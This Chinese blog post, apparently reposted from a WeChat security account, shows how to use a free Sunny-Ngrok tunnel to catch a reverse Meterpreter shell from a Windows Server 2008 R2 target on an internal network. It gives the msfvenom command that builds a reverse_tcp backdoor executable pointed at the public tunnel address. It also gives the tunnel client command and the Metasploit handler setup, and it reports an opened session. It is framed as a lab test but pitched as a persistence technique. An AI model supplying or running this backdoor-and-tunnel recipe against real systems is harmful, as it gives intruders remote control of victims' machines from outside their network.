白嫖Ngrok反弹内网shell

admin 2021年9月4日06:23:07评论113 views字数 921阅读3分4秒阅读模式

文章前言

       在后渗透阶段,权限维持也是很有意思的一个话题。其中有一个适合想我这样的穷人家的孩子利用的方法,我的宗旨是“生命不息白嫖不止”。那么我们来利用内网穿透做一次试验《白嫖之反弹shell》。

 

试验环境:

Windowsserver 2008 R2Kali20.1

使用工具:       

MsfSunny-Ngrok(工具很多这个仅供参考)

涉及资源:    

https://www.ngrok.cc/

 

原理:

         Msf生成exe后门文件,利用Sunny-Ngrok的免费内网转发,来将我们的后门反弹到本地的机子上(这里反弹到kali上)。然后本地设置监听完成一次内网穿透。

 一、注册并下载Sunny-Ngrok

相信大家都能够注册这些,我比较懒就不说明了。

注册完之后 我们去开通隧道

白嫖Ngrok反弹内网shell白嫖Ngrok反弹内网shell


开通完之后我们就有一个免费的公网IP(●ˇ∀ˇ●)嘿嘿

白嫖Ngrok反弹内网shell

接下来下载客户端了我这里下载了 linux的版本 PS:因为这里我们是要将信息转发到内网的kali

二、生成后门

命令如下:

root@kali:~#msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的公网ip LPORT=你开通隧道时设定的端口-f exe -o name.exe

白嫖Ngrok反弹内网shell

三、开启监听

首先打开我们的内网转发工具

本身我已经把工具放到了kali 我们进入工具目录

命令如下:

./sunny clientid 隧道id

白嫖Ngrok反弹内网shell

现在打开我们的内网转发工具

白嫖Ngrok反弹内网shell白嫖Ngrok反弹内网shell

接下来我们就该开启监听了

命令如下:

msf监听:use exploit/multi/handlerset payload windows/meterpreter/reverset_tcpset lhost 127.0.0.1set lport 8000run

所需要的配置需求如下图:

白嫖Ngrok反弹内网shell

开启我们的监听

白嫖Ngrok反弹内网shell

这样我们就完成了前期准备工作了。

接下来就是试验的最终目的了

 

四、试验结果

由于我事先把后门放到了靶机上了 我们来运行它

白嫖Ngrok反弹内网shell

返回到kali 已经得到了一个会话

白嫖Ngrok反弹内网shell

白嫖Ngrok反弹内网shell

成功完成一次白嫖内网转发反弹Shell


ps:虽然做法简单,但是希望能帮助到看诸位看官们。有些截图挺模糊的深感抱歉!


本文始发于微信公众号(NOVASEC):白嫖Ngrok反弹内网shell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月4日06:23:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   白嫖Ngrok反弹内网shellhttp://cn-sec.com/archives/495412.html

发表评论

匿名网友 填写信息